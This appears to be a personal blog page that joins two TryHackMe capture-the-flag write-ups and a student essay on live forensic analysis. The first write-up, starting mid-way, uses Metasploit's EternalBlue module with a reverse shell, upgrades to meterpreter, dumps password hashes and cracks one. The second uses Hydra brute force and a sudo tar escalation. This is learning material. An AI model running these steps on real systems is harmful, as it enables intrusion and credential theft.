   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Launch Metasploit on linux with `msfconsole`. You can search for either the ms # (ms17-010) or the CVE # (2017-0144) and find similar results.
We can see the exploit path is exploit/windows/smb/ms17_010_eternalblue

Options

msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                             /wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.240    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

The options show us a few required options. The only one not set is RHOSTS - which is the target host (see description.)

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.91.32
rhosts => 10.10.91.32

Set the payload to a reversetcp shell

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp

Make sure if you are running openvpn (THM usually requires it) you set the LHOST (local host option) to your tun0 ip. You can find this by running `ifconfig`

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.6.77.21
LHOST => 10.6.77.21

It took me letting the exploit run a few times but I finally got in.

Upgrading from normal shell to meterpreter shell

I am using this writeup to convert the shell.

First, background the current (Normal Shell) session.

C:\Windows\system32>^Z
Background session 1? [y/N]  y
msf6 exploit(windows/smb/ms17_010_eternalblue) >

Select the shell_to_meterpreter module

msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade

Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) >

Our options show that we must add the SESSION.

msf6 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to au
                                       to detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

Set our session to 1 and run.

msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x64/windows               10.6.77.21:4444 -> 10.10.91.32:49233 (10.10.91.32)
  2         shell x64/windows               10.6.77.21:4444 -> 10.10.91.32:49234 (10.10.91.32)

msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1

Now that it has created a new meterpreter session, we can open it

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         shell x64/windows                                      10.6.77.21:4444 -> 10.10.91.32:49233 (10.10.91.3
                                                                   2)
  2         shell x64/windows                                      10.6.77.21:4444 -> 10.10.91.32:49234 (10.10.91.3
                                                                   2)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.6.77.21:4433 -> 10.10.91.32:49246 (10.10.91.3
                                                                   2)

msf6 post(multi/manage/shell_to_meterpreter) > session -i 3
[-] Unknown command: session
msf6 post(multi/manage/shell_to_meterpreter) > session -i 3
[-] Unknown command: session
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter >

Meterpreter

After I got the ugpraded shell, I ran the command `shell` to open a dos shell then `whoami` to verify I was indeet NT AUTHORITY\SYSTEM. Then I ran the `ps` command to list all running processes, and `migrate` to a process running at NT AUTHORITY\SYSTEM

Cracking the password

Dump all the hashes of the users on this machine. You can do this because you are on an elevated shell.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

I copied this hash into a file and used hashcat to crack it. This article shows how to do that.

└─$ hashcat -m 1000 --show hash /usr/share/wordlists/rockyou.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22

Finding the Flags

The first flag can be found at the root of the machine.

meterpreter > ls
Listing: C:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2009-07-13 23:18:56 -0400  $Recycle.Bin
40777/rwxrwxrwx   0      dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx   0      dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Program Files
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Program Files (x86)
40777/rwxrwxrwx   4096   dir   2009-07-13 23:20:08 -0400  ProgramData
40777/rwxrwxrwx   0      dir   2018-12-12 22:13:22 -0500  Recovery
40777/rwxrwxrwx   4096   dir   2018-12-12 18:01:17 -0500  System Volume Information
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Users
40777/rwxrwxrwx   16384  dir   2009-07-13 23:20:08 -0400  Windows
100666/rw-rw-rw-  24     fil   2018-12-12 22:47:39 -0500  flag1.txt
0000/---------    0      fif   1969-12-31 19:00:00 -0500  hiberfil.sys
0000/---------    0      fif   1969-12-31 19:00:00 -0500  pagefile.sys

meterpreter > cat flag1.txt
flag{access_the_machine}meterpreter >

The second flag is in the C:\Windows\System32\config location. This is where passwords are stored.

I was having trouble finding the final flag. But I realized on meterpreter you can do search -f flag* to search for any files that begin with "flag". This showed me the location of the final flag. It is in Jon's documents.

That's all! Happy hacking 🙂

Bounty Hacker

TO SEE THE FULL WRITE-UP WITH IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 16 August 2021

github.com/Armand-Alvarez

Room Link on TryHackMe

Find open ports on the machine

We can see we have the following ports open:

21 - ftp
22 - ssh
80 - http

Who wrote the task list?

FTP

We can see from our nmap scan that ftp allows anonymous login so lets explore that first.

After logging in, we begin in the root directory with nothing but two files. We can download these to our local machine using the wget command.

Reading the file on our local machine shows that lin wrote it.

What service can you bruteforce with the text file found?

The other file we found is called locks.txt:

It looks like a file of possible passwords. We can try using this later.

Lets check out the website.

The homepage has nothing important in it, and the page source doesn't contain anything hidden either.

Gobuster revealed a /images directory that only stores the picture we see on the home page. Nothing important there.

Nikto revealed a few things, but nothing relevant right now:

Given that the website has lead to a dead end right now, the only other service that we can use the password file on is SSH.

What is the users password?

Hint: Hydra may be able to help.

Lets use Hydra to try to figure out which password works with SSH. We can guess that lin is the username for SSH, figuring that is the only name we have gotten so far.

We see our successful password is RedDr4gonSynd1cat3.

Testing it on SSH works.

user.txt

Once we get into the IP via SSH, we can cat the file.

The flag for the user is: THM{CR1M3_SyNd1C4T3}

root.txt

Running sudo -l as lin gives us the following:

We can see that lin may run /bin/tar as root. This is great!

Getting on gtfobins, we can search for "tar" and click SUDO (because we have sudo privilages for tar), and are given the following command:

Once we run this command on the SSH terminal, we gain root privilages. We can then read root.txt to find the flag: THM{80UN7Y_h4cK3r}

Thats all! Happy hacking.

🙂

Live Analysis

This essay was written for Professor Leinecker's Digital Forensics I course.

Live analysis, or a live response, is when you observe the volatile memory of a system. This kind of memory can be RAM or cache memory, for example. A problem with live analysis is volatility. Much of this information is what is called “volatile”, meaning it will be deleted or altered if the device loses power. So why do live analysis then? Sometimes it is the only option. If you have a warrant that limits you to live response, or if you need to capture that volatile memory to observe internet activity, for example, this would restrict you to only performing a live response. Of course, if you already have (or have seized) a device, you can pull a full image from it and do analysis, but you won’t be able to view much of this volatile memory because it will be gone if the device is powered off. Imaging a hard drive is great for analysis, but it won’t contain any of the vital volatile memory that may be needed to gain evidence for a conviction of wrongdoing.

What kind of information might be found before a computer is shut down? Well, this can be anything from user data, to applications or programs. Basically, it is the temporary memory of a computer. Web cache and browsing information might be stored in volatile memory too, revealing somebody’s web activity. Cookies are an example of web-based volatile memory. They are stored in the web browser for (typically) as long as the browser remains open. However, once the browser is closed, the cookies are then lost. Sometimes, programs or applications will store passwords or their hashes in memory. If you can pull the strings from RAM memory, you may be able to crack the hashes and gain the cleartext passwords.

The risks to doing live response can be great, depending on the system, time you have to do it, and tools you use. If you are performing live analysis on a production server, for example, you have to be very careful not to crash the system. Some tools might use too much power or might not work well with the configuration of the server, and cause a hard-crash. This is bad, because crashing a production system may give the company leverage to hold you liable for losses incurred during the outage; for a big company these losses may be great. Some tools also don’t actually perform pure live analysis, meaning they may alter parts of memory in the process of collection. This in turn would make any evidence gathered moot, because altered evidence has no integrity and is oftentimes not admissible in court, or sometimes even in private investigations. Another consideration is data availability and integrity prior to collection. Some people may set up traps that will automatically shut down the computer if it detects live analysis being done on it. Also, most people have encrypted hard drives and keep their computer closed at all times when not on it. They do this because the non-volatile memory is encrypted, and as long as they have their computer, they can shut it down when not using it.

Wireshark is an example of a live analysis tool. It can be set up on a machine to capture network traffic between that machine and other endpoints. Magen RAM capture is a tool that does what it’s name implies: it captures volatile RAM memory. RAM Capturer does the same.